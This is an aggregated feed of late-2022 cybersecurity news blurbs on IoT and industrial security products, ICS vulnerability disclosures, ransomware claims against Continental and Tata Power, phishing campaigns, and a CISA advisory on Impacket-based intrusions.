    2022-11-15 https://www.helpnetsecurity.com/2022/11/15/phosphorus-redapt/
    

    The new Phosphorus and Redapt partnership will see the two companies jointly delivering a new generation of xIoT security solutions in the US to meet growing enterprise demand for xIoT attack surface management and remediation capabilities. “Enterprises face a growing risk of cyber attacks because of vulnerable IoT and OT endpoints which traditional security companies can’t protect,” said Kal Gajera, Director of North America Channels at Phosphorus. “These attacks can lead to a full compromise … More →

    The post Phosphorus and Redapt join forces to deliver xIoT security to US enterprises appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Skyworks collaborates with MediaTek to offer end-to-end 5G automotive solutions

    industry
    2022-11-15 https://www.helpnetsecurity.com/2022/11/15/skyworks-solutions-mediatek/
    

    Skyworks announced that the company has engaged with MediaTek to offer a complete modem-to-antenna automotive-grade 5G solution. This 5G New Radio Sky5A RF front-end solution will accelerate the deployment of this protocol across an array of automotive OEM and consumer service offerings. “The rollout of 5G is reshaping the automotive market with a variety of safety and entertainment telematics applications to improve the driving experience,” said Martin Lin, deputy general manager of the Wireless Communications … More →

    The post Skyworks collaborates with MediaTek to offer end-to-end 5G automotive solutions appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Researchers Reported Critical SQLi and Access Flaws in Zendesk Analytics Service

    industry
    2022-11-15 https://thehackernews.com/2022/11/researchers-reported-critical-sqli-and.html
    Cybersecurity researchers have disclosed details of now-patched flaws in Zendesk Explore that could have been exploited by an attacker to gain unauthorized access to information from customer accounts that have the feature turned on. "Before it was patched, the flaw would have allowed threat actors to access conversations, email addresses, tickets, comments, and other information from Zendesk "

    Autosummary: "

    ---

    Key cybersecurity trends in the energy sector

    industry ciber
    2022-11-14 https://www.helpnetsecurity.com/2022/11/14/energy-sector-cybersecurity-trends-video/
    

    The key trends for the energy industry are about how we manage the future supply and demand challenges at a much more granular level than we are currently able do. If we’re ever to balance the supply and demand equation against the backdrop of increased consumer demands (electric vehicles, mass transport systems, electrification of home heating systems, etc.), and the increased complexity in the generation, distribution and storage systems, this supply and demand will have … More →

    The post Key cybersecurity trends in the energy sector appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    High-Severity Flaw Reported in Critical System Used by Oil and Gas Companies

    industry
    2022-11-10 https://thehackernews.com/2022/11/high-severity-flaw-reported-in-critical.html
    Cybersecurity researchers have disclosed details of a new vulnerability in a system used across oil and gas organizations that could be exploited by an attacker to inject and execute arbitrary code. The vulnerability, tracked as CVE-2022-0902 (CVSS score: 8.1), is a path-traversal vulnerability in ABB Totalflow flow computers and remote controllers. "Attackers can exploit this flaw to gain root "

    Autosummary: "

    ---

    A bug in ABB Totalflow flow computers exposed oil and gas companies to attack

    exploits industry
    2022-11-10 https://securityaffairs.co/wordpress/138331/security/abb-totalflow-flaw.html
    

    A flaw in the ABB Totalflow system used in oil and gas organizations could be exploited by an attacker to inject and execute arbitrary code. Researchers from industrial security firm Claroty disclosed details of a vulnerability affecting ABB Totalflow flow computers and remote controllers. Flow computers are used to calculate volume and flow rates for oil […]

    The post A bug in ABB Totalflow flow computers exposed oil and gas companies to attack appeared first on Security Affairs.

    "

    Autosummary: Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "

    ---

    How geopolitical turmoil changed the cybersecurity threat landscape

    industry ciber
    2022-11-08 https://www.helpnetsecurity.com/2022/11/08/cybersecurity-threat-landscape-2022/
    

    ENISA, EU’s Agency for Cybersecurity, released its annual Threat Landscape report, covering the period from July 2021 up to July 2022. Cybersecurity threat landscape in 2022 With more than 10 terabytes of data stolen monthly, ransomware still fares as one of the prime threats in the new report with phishing now identified as the most common initial vector of such attacks. The other threats to rank highest along ransomware are attacks against availability also called … More →

    The post How geopolitical turmoil changed the cybersecurity threat landscape appeared first on Help Net Security.

    "

    Autosummary: Ransomware : 60% of affected organizations may have paid ransom demands : 60% of affected organizations may have paid ransom demands Malware : 66 disclosures of zero-day vulnerabilities observed in 2021 : 66 disclosures of zero-day vulnerabilities observed in 2021 Social engineering : Phishing remains a popular technique but we see new forms of phishing arising such as spear-phishing, whaling, smishing and vishing : Phishing remains a popular technique but we see new forms of phishing arising such as spear-phishing, whaling, smishing and vishing Threats against data : Increasing in proportionally to the total of data produced : Increasing in proportionally to the total of data produced Disinformation – misinformation :Escalating AI-enabled disinformation, deepfakes and disinformation-as-a-service Supply chain targeting : Third-party incidents account for 17% of the intrusions in 2021 compared to less than 1% in 2020 : Third-party incidents account for 17% of the intrusions in 2021 compared to less than 1% in 2020 Threats against availability : : Largest denial of service (DDoS) attack ever was launched in Europe in July 2022 Internet: destruction of infrastructure, outages and rerouting of internet traffic. "

    ---

    Abusing Microsoft Dynamics 365 Customer Voice in phishing attacks

    financial industry
    2022-11-07 https://securityaffairs.co/wordpress/138147/cyber-crime/microsoft-dynamics-365-customer-voice-phishing.html
    

    Researchers uncovered a campaign abusing Microsoft Dynamics 365 customer voice to steal credentials from the victims. Microsoft’s Dynamics 365 Customer Voice product allows organizations to gain customer feedback, it is used to conduct customer satisfaction surveys. Researchers from cybersecurity firm Avanan, uncovered a campaign abusing Microsoft Dynamics 365 customer voice to steal credentials from the […]

    The post Abusing Microsoft Dynamics 365 Customer Voice in phishing attacks appeared first on Security Affairs.

    "

    Autosummary: Below are the suggestions provided by the experts: Always hover all URLs, even those not in the email body When receiving an email with a voicemail, ensure this is a typical type of email received before thinking of engaging If ever unsure about an email, ask the original sender Follow me on Twitter: @securityaffairs and Facebook Pierluigi Paganini (SecurityAffairs – hacking, phishing) "

    ---

    CISA Warns of Critical Vulnerabilities in 3 Industrial Control System Software

    industry
    2022-11-04 https://thehackernews.com/2022/11/cisa-warns-of-critical-vulnerabilities.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published three Industrial Control Systems (ICS) advisories about multiple vulnerabilities in software from ETIC Telecom, Nokia, and Delta Industrial Automation. Prominent among them is a set of three flaws affecting ETIC Telecom"s Remote Access Server (RAS), which "could allow an attacker to obtain sensitive information and "

    Autosummary: "

    ---

    Attackers leverage Microsoft Dynamics 365 to phish users

    industry
    2022-11-04 https://www.helpnetsecurity.com/2022/11/04/microsoft-dynamics-365-phishing/
    

    Attackers are abusing Microsoft Dynamics 365 Customer Voice to evade email filters and deliver phishing emails into Microsoft users’ inboxes, Avanan researchers are warning. The attack Microsoft Dynamics 365 is a suite of enterprise resource planning (ERP) and customer relationship management (CRM) applications. Customer Voice is one of these applications, and it’s used for collecting data and feedback from customers via surveys, phone calls, etc. The attackers have created Microsoft Dynamics 365 Customer Voice accounts … More →

    The post Attackers leverage Microsoft Dynamics 365 to phish users appeared first on Help Net Security.

    "

    Autosummary: Similarly, phishers have been known to exploit Facebook Ads, QuickBooks, Lucidchart, Adobe Cloud, and many other legitimate services. "

    ---

    IoT cybersecurity is slowly gaining mainstream attention

    industry ciber
    2022-11-03 https://www.helpnetsecurity.com/2022/11/03/iot-devices-cybersecurity/
    

    In this interview for Help Net Security, Jason Oberg, CTO at Cycuity, talks about IoT devices cybersecurity, from production to usage, and how far have we come to securing these devices. IoT has been part of our reality for quite some time, but what about the security of these devices? Is it becoming a priority? We’ve seen the concern and prioritization of IoT security growing, this is due both to the growing popularity of these … More →

    The post IoT cybersecurity is slowly gaining mainstream attention appeared first on Help Net Security.

    "

    Autosummary: In this interview for Help Net Security, Jason Oberg, CTO at Cycuity, talks about IoT devices cybersecurity, from production to usage, and how far have we come to securing these devices.That said, we see a shift to making security a key component of the entire development process so that the approach is systematic, predictable, and scalable with the usual development schedule. "

    ---

    Verified users beware! Scammers are exploiting Twitter turmoil caused by Elon Musk’s takeover

    financial exploits industry
    2022-11-03 https://www.tripwire.com/state-of-security/verified-users-beware-scammers-are-exploiting-twitter-turmoil-caused-elon-musks
    The world"s richest man"s plans for the news junkie"s favourite social network inevitably get a great deal of attention. Not everyone will be aware of the details of what Elon Musk might be planning for Twitter, but they will certainly be aware that it"s a hot topic. And so if a Twitter user receives a message claiming to be about their verified account, they may very well believe it... and that makes them more susceptible to falling into a trap. Read more in my article on the Tripwire State of Security blog. "

    Autosummary: The emails warn users that their "Verified" status - a coveted blue and white tick badge displayed alongside their name - will have to be paid for on a monthly basis, unless they can "fully verify [they are] famous or well-known. "

    ---

    LockBit ransomware claims attack on Continental automotive giant

    exploits ransomware industry
    2022-11-03 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-claims-attack-on-continental-automotive-giant/
    The LockBit ransomware gang has claimed responsibility for a cyberattack against the German multinational automotive group Continental. [...] "

    Autosummary: Continental entry on Lockbit"s data leak site (BleepingComputer) ​Breached in an August cyberattack Continental"s VP of Communications & Marketing, Kathryn Blackwell, didn"t confirm LockBit"s claims and would not share any details regarding the attack when BleepingComputer reached out but, instead, linked to a press release from August 24 regarding a cyberattack that led to a breach of Continental"s systems. "

    ---

    LockBit ransomware gang claims the hack of Continental automotive group

    exploits ransomware industry
    2022-11-03 https://securityaffairs.co/wordpress/138062/cyber-crime/lockbit-gang-claims-continental-hack.html
    

    The LockBit ransomware group claimed to have hacked the multinational automotive group Continental and threatens to leak stolen data. LockBit ransomware gang announced to have hacked the German multinational automotive parts manufacturing company Continental. The group added the name of the company to its Tor leak site and is threatening to publish alleged stolen data if the […]

    The post LockBit ransomware gang claims the hack of Continental automotive group appeared first on Security Affairs.

    "

    Autosummary: "

    ---

    Extortion fears after hacker stole patient files from Dutch mental health clinics

    industry
    2022-10-31 https://www.bitdefender.com/blog/hotforsecurity/extortion-fears-after-hacker-stole-patient-files-from-dutch-mental-health-clinics/
    Patients of Dutch mental health clinics are being warned that their personal records have fallen into the hands of hackers following a security breach at an online portal that "guaranteed" their privacy. Read more in my article on the Hot for Security blog. "

    Autosummary: "

    ---

    BlackByte ransomware group hit Asahi Group Holdings, a precision metal manufacturing and metal solution provider

    exploits industry
    2022-10-30 https://securityaffairs.co/wordpress/137803/cyber-crime/blackbyte-ransomware-asahi-group-holdings.html
    

    The BlackByte ransomware group claims to have compromised Asahi Group Holdings, a precision metal manufacturing and metal solution provider. Asahi Group Holdings, Ltd. is a precision metal manufacturing and metal solution provider, for more than 40 years, the company has been delivering end-to-end services in the industries of precision metals and thin-film coatings with different teams […]

    The post BlackByte ransomware group hit Asahi Group Holdings, a precision metal manufacturing and metal solution provider appeared first on Security Affairs.

    "

    Autosummary: "

    ---

    Elektrobit and Canonical join forces to build the next generation of automotive software

    industry
    2022-10-29 https://www.helpnetsecurity.com/2022/10/30/elektrobit-canonical/
    

    Elektrobit and Canonical have partnered to bring the benefits of Canonical’s Ubuntu operating system to automotive software. As the industry transitions towards software-defined vehicles, the new partnership will make it easier than ever before for car makers, suppliers, and developers to create the next generation of vehicle applications, while meeting stringent automotive standards. Combining Canonical’s open-source Linux operating system with Elektrobit’s expertise in automotive-grade embedded software will enable long-term maintenance, over-the-air updates and functional vehicle … More →

    The post Elektrobit and Canonical join forces to build the next generation of automotive software appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Open Systems MDR+ IoT secures IoT and OT devices alongside IT infrastructure

    industry
    2022-10-27 https://www.helpnetsecurity.com/2022/10/27/open-systems-mdr-iot/
    

    Open Systems has launched MDR+ IoT, which extends the 24×7 security monitoring of its MDR+ to protect connected devices used in Internet of Things (IoT) and Operational Technology (OT) applications. By adding IoT and OT telemetry to MDR+, customers benefit from 24×7 detection and response that correlates alerts across their IoT, OT and IT environments for maximum visibility and protection as part of a holistic security program. Corporate adoption of IoT and OT devices has … More →

    The post Open Systems MDR+ IoT secures IoT and OT devices alongside IT infrastructure appeared first on Help Net Security.

    "

    Autosummary: “Combining the strength of Open Systems’ MDR+, our next generation MDR service, together with Defender for IoT allows us to minimize the threat surface across our clients’ entire infrastructures, using the same best practices, rigor and workflow that helped Open Systems win Microsoft’s Security MSSP of the Year for 2022.”, Corn added. "

    ---

    Perygee raises $4.75 million to secure most vulnerable IoT and OT devices

    industry
    2022-10-26 https://www.helpnetsecurity.com/2022/10/27/perygee-funding/
    

    Perygee has closed a $4.75 million seed investment led by Ballistic Ventures. The round also includes investment from cybersecurity angels Ray Rothrock, John Donovan, Ohad Finkelstein, Corey Thomas, and Bryson Bort, as well as BBG Ventures, which backs early-stage startups with female founders. To date, Perygee has raised $6.35 million in funding. Internet of Things (IoT) and Operational Technology (OT) devices are critical aspects of the supply chain, from manufacturing plants to utilities to hospitals … More →

    The post Perygee raises $4.75 million to secure most vulnerable IoT and OT devices appeared first on Help Net Security.

    "

    Autosummary: “Effectively managing several OT systems requires an intelligent solution to handle the complex data challenges,” said Andrew Schaefer, Vice President and CTO of EnVen Energy Corp. “With Perygee, we can quickly provide structure to our data, easily parse and share relevant information with different stakeholders, and automate the maintenance of our data to maintain our security posture over time.”, Schaefer continued.The round also includes investment from cybersecurity angels Ray Rothrock, John Donovan, Ohad Finkelstein, Corey Thomas, and Bryson Bort, as well as BBG Ventures, which backs early-stage startups with female founders. "

    ---

    Hive Ransomware Hackers Begin Leaking Data Stolen from Tata Power Energy Company

    exploits ransomware industry
    2022-10-25 https://thehackernews.com/2022/10/hive-ransomware-hackers-begin-leaking.html
    The Hive ransomware-as-a-service (RaaS) group has claimed responsibility for a cyber attack against Tata Power that was disclosed by the company less than two weeks ago. The incident is said to have occurred on October 3, 2022. The threat actor has also been observed leaking stolen data exfiltrated prior to encrypting the network as part of its double extortion scheme. This allegedly comprises "

    Autosummary: "

    ---

    Asset risk management: Getting the basics right

    industry
    2022-10-24 https://www.helpnetsecurity.com/2022/10/24/asset-risk-management-challenges/
    

    In this interview with Help Net Security, Yossi Appleboum, CEO at Sepio, talks about asset risk management challenges for different industries and where it’s heading. Cyberattacks show no signs of slowing down. What do organizations need to do to boost their asset risk management? They need to understand what’s in their environment. You can’t do anything to manage risk if you don’t know what assets you have and their associated risk posture. Increased spending on … More →

    The post Asset risk management: Getting the basics right appeared first on Help Net Security.

    "

    Autosummary: So, yes, the asset risk factor will reach new heights because it is an integral part of asset management and, in turn, cybersecurity. In the world of cybersecurity, asset management is, at its core, the understanding of IT assets in an entity’s environment.In this interview with Help Net Security, Yossi Appleboum, CEO at Sepio, talks about asset risk management challenges for different industries and where it’s heading. "

    ---

    Norway PM warns of Russia cyber threat to oil and gas industry

    industry
    2022-10-24 https://securityaffairs.co/wordpress/137561/cyber-warfare-2/norway-pm-warns-russia-threat.html
    

    Norway ’s prime minister warned last week that Russia poses “a real and serious threat” to the country’s oil and gas industry. Norway ’s prime minister Jonas Gahr Støre warned that Russia poses “a real and serious threat” to the country’s oil and gas industry. The minister claims its country is going slow in adopting […]

    The post Norway PM warns of Russia cyber threat to oil and gas industry appeared first on Security Affairs.

    "

    Autosummary: "

    ---

    Iran’s atomic energy agency confirms hack after stolen data leaked online

    industry
    2022-10-24 https://www.bleepingcomputer.com/news/security/iran-s-atomic-energy-agency-confirms-hack-after-stolen-data-leaked-online/
    The Iranian Atomic Energy Organization (AEOI) has confirmed that one of its subsidiaries" email servers was hacked after the ""Black Reward" hacking group published stolen data online. [...] "

    Autosummary: "

    ---

    Typosquat campaign mimics 27 brands to push Windows, Android malware

    exploits industry
    2022-10-23 https://www.bleepingcomputer.com/news/security/typosquat-campaign-mimics-27-brands-to-push-windows-android-malware/
    A massive, malicious campaign is underway using over 200 typosquatting domains that impersonate twenty-seven brands to trick visitors into downloading various Windows and Android malware. [...] "

    Autosummary: Malicious site impersonating PayPal Some of the domains used for this purpose are: payce-google[.]com – impersonates Google Wallet snanpckat-apk[.]com – impersonates Snapchat vidmates-app[.]com – impersonates VidMate paltpal-apk[.]com – impersonates PayPal m-apkpures[.]com – impersonates APKPure tlktok-apk[.]link – impersonates download portal for TikTok app In all these cases, the malware delivered to users attempting to download the APKs is ERMAC, a banking trojan targeting banking accounts and cryptocurrency wallets from 467 apps. "

    ---

    Hackers stole sensitive data from Iran’s atomic energy agency

    industry
    2022-10-23 https://securityaffairs.co/wordpress/137513/hacking/hackers-stole-sensitive-data-from-irans-atomic-energy-agency.html
    

    Iran’s atomic energy agency claims that alleged state-sponsored hackers have compromised its email system. Iran’s atomic energy agency revealed on Sunday that a nation-state actor had access to a subsidiary’s network and free access to its email system, the Associated Press reports. The Iranian government has yet to attribute the attack to a specific The […]

    The post Hackers stole sensitive data from Iran’s atomic energy agency appeared first on Security Affairs.

    "

    Autosummary: The Iranian government has yet to attribute the attack to a specific The hacker group, which calls itself Black Reward announced the hack of the Atomic Energy Organization on Telegram and shared files of contracts, construction plans, and details about equipment at the Bushehr plant as proof of the intrusion. "

    ---

    MetricStream Euphrates enables enterprises to improve their GRC program performance

    industry
    2022-10-21 https://www.helpnetsecurity.com/2022/10/21/metricstream-euphrates/
    

    MetricStream has unveiled its latest product release, focused on accelerating GRC program performance. The purpose-built low-code/no-code platform empowers customers to easily personalize and configure products to their needs. New APIs help connect MetricStream with external systems and enrich GRC insights to accelerate decision making. “Today’s CXOs are under heavy pressure to balance a plethora of threats, ensure business resilience, and reduce costs,” said Prasad Sabbineni, Co-CEO, MetricStream. “It’s our belief that we can help them … More →

    The post MetricStream Euphrates enables enterprises to improve their GRC program performance appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    EnergyAustralia Electricity company discloses security breach

    government industry
    2022-10-21 https://securityaffairs.co/wordpress/137473/data-breach/energyaustralia-data-breach.html
    

    Electricity company EnergyAustralia suffered a security breach, threat actors had access to information on 323 customers. Another Australian organization was hit by a severe cyber attack, this time the victim is the Electricity company EnergyAustralia. EnergyAustralia is the country’s third-largest energy retailer. The company confirmed that threat actors had access to information on 323 residential and […]

    The post EnergyAustralia Electricity company discloses security breach appeared first on Security Affairs.

    "

    Autosummary: According to a statement released on Friday, the compromised data were stored on the company’s online platform, My Account, and included customer names, addresses, email addresses, electricity and gas bills, phone numbers, and the first six and last three digits of their credit cards. "

    ---

    Mandiant Breach Analytics empowers enterprises to gain insight on breach activity in IT environments

    industry
    2022-10-19 https://www.helpnetsecurity.com/2022/10/19/mandiant-breach-analytics/
    

    Mandiant released Mandiant Breach Analytics for Google Cloud’s Chronicle. Mandiant Breach Analytics combines Mandiant’s threat intelligence with the power of the Google Cloud Chronicle Security Operations suite to help organizations improve security effectiveness and reduce business risk. Threat actors continue to escalate the sophistication and aggressiveness of their attacks, targeting businesses of all sizes and across all industries. With global median dwell time—defined as the duration between the start of a cyber intrusion and when … More →

    The post Mandiant Breach Analytics empowers enterprises to gain insight on breach activity in IT environments appeared first on Help Net Security.

    "

    Autosummary: Mandiant Breach Analytics can empower organizations to: Strengthen cyber defense posture : Fueled by the Mandiant Intel Grid, Breach Analytics leverages up-to-the-moment breach intelligence and expertise gleaned from Mandiant’s world-class incident responders, analysts and threat hunters, enabling organizations to put that intelligence into action without timely and costly security engineering. "

    ---

    CISA Warns of Critical Flaws Affecting Industrial Appliances from Advantech and Hitachi

    industry
    2022-10-19 https://thehackernews.com/2022/10/cisa-warns-of-critical-flaws-affecting.html
    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday released two Industrial Control Systems (ICS) advisories pertaining to severe flaws in Advantech R-SeeNet and Hitachi Energy APM Edge appliances. This consists of three weaknesses in the R-SeeNet monitoring solution, successful exploitation of which "could result in an unauthorized attacker remotely deleting files on the "

    Autosummary: "

    ---

    Rockwell Automation FactoryTalk Design Hub improves development of automation projects

    industry
    2022-10-16 https://www.helpnetsecurity.com/2022/10/16/rockwell-automation-factorytalk-design-hub/
    

    Rockwell Automation released FactoryTalk Design Hub, enabling industrial organizations to transform their automation design capabilities with a more simplified, productive way to work powered by the cloud. Teams of all sizes, skillsets, and locations can work smarter through enhanced collaboration, improved lifecycle management, and on-demand access to cloud-based software. The result is increased design productivity, faster time to market, and systems that cost less to build and maintain. “In this new age of ‘work from … More →

    The post Rockwell Automation FactoryTalk Design Hub improves development of automation projects appeared first on Help Net Security.

    "

    Autosummary: “Rockwell Automation’s FactoryTalk Design Hub enables seamless digital thread connectivity between its design, visualization, digital twin, storage, and remote access software tools that provide control system developers with immediate on-demand access to all automation designs as needed regardless of their location, helping these companies to accelerate their initiatives ranging from digital transformation to IT/OT convergence.”, Resnick added. “The digital transformation of automation design capabilities requires both the cloud to maximize control system developers’ productivity, and it also requires that all software tools are connected to each other by a digital thread to maximize collaboration, scalability, and productivity,” according to Craig Resnick, vice president, ARC Advisory Group. "

    ---

    Indian Energy Company Tata Power"s IT Infrastructure Hit By Cyber Attack

    industry
    2022-10-15 https://thehackernews.com/2022/10/indian-energy-company-tata-powers-it.html
    Tata Power Company Limited, India"s largest integrated power company, on Friday confirmed it was targeted by a cyberattack. The intrusion on IT infrastructure impacted "some of its IT systems," the company said in a filing with the National Stock Exchange (NSE) of India. It further said it has taken steps to retrieve and restore the affected machines, adding it put in place "

    Autosummary: "

    ---

    Portnox unveils IoT fingerprinting and profiling solution to address rising IoT security threats

    industry
    2022-10-13 https://www.helpnetsecurity.com/2022/10/13/portnox-iot-security-solution/
    

    Portnox released a cloud-native IoT security solution to help mid-market and enterprise businesses address rising Internet of Things (IoT) security threats. Now available via the Portnox Cloud, Portnox’s new IoT fingerprinting and profiling capabilities empower organizations to identify, authenticate, authorize, and segment IoT devices across their network to ensure an effective zero trust security posture. “No organization is immune to the inherent and increasing number of security risks IoT devices pose as they are more … More →

    The post Portnox unveils IoT fingerprinting and profiling solution to address rising IoT security threats appeared first on Help Net Security.

    "

    Autosummary: Large enterprises are not alone when it comes to rising IoT security headaches – organizations of all sizes are actively trying to strengthen their security postures to account for the surge of threats tied to the rising operational dependence on IoT. With so many IoT devices – printers, cameras, thermostats, sensors, monitors, etc. – now in use across all types of organizations, the ability to automatically onboard and enforce IoT device authentication, control and security policies across the network is mission critical. "

    ---

    Critical Bug in Siemens SIMATIC PLCs Could Let Attackers Steal Cryptographic Keys

    exploits industry
    2022-10-12 https://thehackernews.com/2022/10/critical-bug-in-siemens-simatic-plcs.html
    A vulnerability in Siemens Simatic programmable logic controller (PLC) can be exploited to retrieve the hard-coded, global private cryptographic keys and seize control of the devices. "An attacker can use these keys to perform multiple advanced attacks against Siemens SIMATIC devices and the related TIA Portal, while bypassing all four of its access level protections," industrial cybersecurity "

    Autosummary: "

    ---

    BazarCall Callback Phishing Attacks Constantly Evolving Its Social Engineering Tactics

    financial industry
    2022-10-11 https://thehackernews.com/2022/10/bazarcall-callback-phishing-attacks.html
    The operators behind the BazaCall call back phishing method have continued to evolve with updated social engineering tactics to deploy malware on targeted networks. The scheme eventually acts as an entry point to conduct financial fraud or the delivery of next-stage payloads such as ransomware, cybersecurity company Trellix said in a report published last week. Primary targets of the latest "

    Autosummary: "

    ---

    Cyware hires three industry experts to increase its marketing programs

    industry
    2022-10-11 https://www.helpnetsecurity.com/2022/10/12/cyware-marketing-leadership-team/
    

    Cyware has appointed Willy Leichter as Vice President of Marketing, Jeff Bell as Director of Demand Generation, and Mark Bermingham as Director of Product Marketing. In their new roles, Willy, Jeff, and Mark will expand the company’s marketing capabilities. In its quest to solve the automation, threat intelligence, and security collaboration challenges for security teams globally, Willy, Jeff, and Mark will help Cyware to grow its reach and generate demand by increasing its marketing programs. … More →

    The post Cyware hires three industry experts to increase its marketing programs appeared first on Help Net Security.

    "

    Autosummary: Serving numerous large Enterprises, MSSPs, and ISACs across the globe, Cyware is poised to lead the creation of next-gen security infrastructure through its diverse all-star team, extensive partner ecosystem, loyal clientele, and industry-leading products. "

    ---

    Hackers behind IcedID malware attacks diversify delivery tactics

    exploits industry
    2022-10-10 https://www.bleepingcomputer.com/news/security/hackers-behind-icedid-malware-attacks-diversify-delivery-tactics/
    The threat actors behind IcedID malware phishing campaigns are utilizing a wide variety of distribution methods, likely to determine what works best against different targets. [...] "

    Autosummary: Diversifying the delivery chain Between September 13 and 21, Cymru analysts noticed the following different delivery methods of IcedID on targets: Password Protected ZIP -> ISO -> LNK -> JS -> [CMD or BAT] -> DLL Password Protected ZIP -> ISO -> CHM -> DLL Password Protected ZIP -> ISO -> LNK -> BAT -> DLL Malicious Word or Excel documents laced with macros Delivered directly via the PrivateLoader pay-per-install service These campaigns used either the Italian language or English, with the former having smaller-scale success than the latter. "

    ---

    Semtech’s LoRa Connect optimizes CWD Limited’s dual combo module for IoT device connectivity

    industry
    2022-10-08 https://www.helpnetsecurity.com/2022/10/08/semtech-cwd-limited/
    

    Semtech has announced that CWD Limited has developed a dual combo module incorporating Semtech’s LoRa Connect platform and the LoRaWAN standard connectivity as well as Bluetooth Low Energy (BLE) to optimize high data rate, long range wireless communication for IoT device connectivity. The CWD CBTLRM02 dual combo module is utilized in smart utility meters and wearables with Semtech’s LoRa Connect (SX1262) System on Chip (SoC) for communication in the 150MHz to 960MHz bands for LoRa … More →

    The post Semtech’s LoRa Connect optimizes CWD Limited’s dual combo module for IoT device connectivity appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Callback phishing attacks evolve their social engineering tactics

    financial industry
    2022-10-08 https://www.bleepingcomputer.com/news/security/callback-phishing-attacks-evolve-their-social-engineering-tactics/
    The BazarCall malicious operation has evolved its social engineering methods, keeping the old fake charges lure for the first phase of the attack but then switching to pretending to help the victim deal with an infection or hack. [...] "

    Autosummary: New social engineering tricks The social engineering process has changed in recent callback phishing campaigns, although the bait in the phishing email remains the same, an invoice for a payment made to Geek Squad, Norton, McAfee, PayPal, or Microsoft. "

    ---

    Veratad VX improves identity verification and analytics for business users

    industry
    2022-10-07 https://www.helpnetsecurity.com/2022/10/07/veratad-vx/
    

    Veratad announced the unveiling of “Veratad VX” – a new global age and identity verification platform designed to deliver a no-code journey orchestration and automated verification experience. The new VX orchestration platform is an extension of Veratad’s proven core technology, IDresponse, that currently synthesizes dozens of providers and verification methods allowing clients access them through a single API integration. Veratad VX business users can now create sophisticated, multi-touch customer verification workflows without touching a line … More →

    The post Veratad VX improves identity verification and analytics for business users appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Phosphorus enhances its xIoT security platform to strengthen enterprise device security

    industry
    2022-10-07 https://www.helpnetsecurity.com/2022/10/07/phosphorus-enterprise-xiot-security-platform/
    

    Phosphorus announced important new enhancements to its Enterprise xIoT Security Platform that will improve organizations’ ability to reduce their xIoT attack surface and prevent sophisticated threats. “The proliferation of xIoT devices is creating vast new risks for today’s enterprises, with attackers increasingly able to evade defenses and breach companies through these overlooked and often unmonitored devices,” said Sonu Shankar, VP of Product Management at Phosphorus. “Our xIoT security platform already provides unmatched capabilities for finding, … More →

    The post Phosphorus enhances its xIoT security platform to strengthen enterprise device security appeared first on Help Net Security.

    "

    Autosummary: Phosphorus’s Enterprise xIoT Security Platform is a consolidated xIoT security offering, delivering Attack Surface Management, Hardening and Remediation, and Detection and Response across the full range of IoT, OT, and Network-connected devices—spanning both new and legacy devices. "

    ---

    FBI, CISA, and NSA Reveal How Hackers Targeted a Defense Industrial Base Organization

    industry
    2022-10-05 https://thehackernews.com/2022/10/fbi-cisa-and-nsa-reveal-how-hackers.html
    U.S. cybersecurity and intelligence agencies on Tuesday disclosed that multiple nation-state hacking groups potentially targeted a "Defense Industrial Base (DIB) Sector organization"s enterprise network" as part of a cyber espionage campaign. "[Advanced persistent threat] actors used an open-source toolkit called Impacket to gain their foothold within the environment and further compromise the "

    Autosummary: "

    ---

    Back to Basics: Cybersecurity"s Weakest Link

    industry ciber
    2022-10-04 https://thehackernews.com/2022/10/back-to-basics-cybersecuritys-weakest.html
    A big promise with a big appeal. You hear that a lot in the world of cybersecurity, where you"re often promised a fast, simple fix that will take care of all your cybersecurity needs, solving your security challenges in one go.  It could be an AI-based tool, a new superior management tool, or something else – and it would probably be quite effective at what it promises to do. But is it a silver "

    Autosummary: All it took was a simple social engineering message – something like, "Hey Bob, I"m from the IT team, and we need to check something on your PC, so I"m sending you a tool for you to run. And it"s not just users that need educating – you should reinforce these practices in your security team too, by covering patching, permissions, and overall security positioning. "

    ---

    AA22-277A: Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization

    industry
    2022-10-04 https://us-cert.cisa.gov/ncas/alerts/aa22-277a
    Original release date: October 4, 2022
    

    Summary

    Actions to Help Protect Against Russian State-Sponsored Malicious Cyber Activity:
    
    • Enforce multifactor authentication (MFA) on all user accounts.
    • Implement network segmentation to separate network segments based on role and functionality.
    • Update software, including operating systems, applications, and firmware, on network assets.
    • Audit account usage.

    From November 2021 through January 2022, the Cybersecurity and Infrastructure Security Agency (CISA) responded to advanced persistent threat (APT) activity on a Defense Industrial Base (DIB) Sector organization’s enterprise network. During incident response activities, CISA uncovered that likely multiple APT groups compromised the organization’s network, and some APT actors had long-term access to the environment. APT actors used an open-source toolkit called Impacket to gain their foothold within the environment and further compromise the network, and also used a custom data exfiltration tool, CovalentStealer, to steal the victim’s sensitive data.

    This joint Cybersecurity Advisory (CSA) provides APT actors tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) identified during the incident response activities by CISA and a third-party incident response organization. The CSA includes detection and mitigation actions to help organizations detect and prevent related APT activity. CISA, the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) recommend DIB sector and other critical infrastructure organizations implement the mitigations in this CSA to ensure they are managing and reducing the impact of cyber threats to their networks.

    Download the PDF version of this report: pdf, 692 KB

    For a downloada "

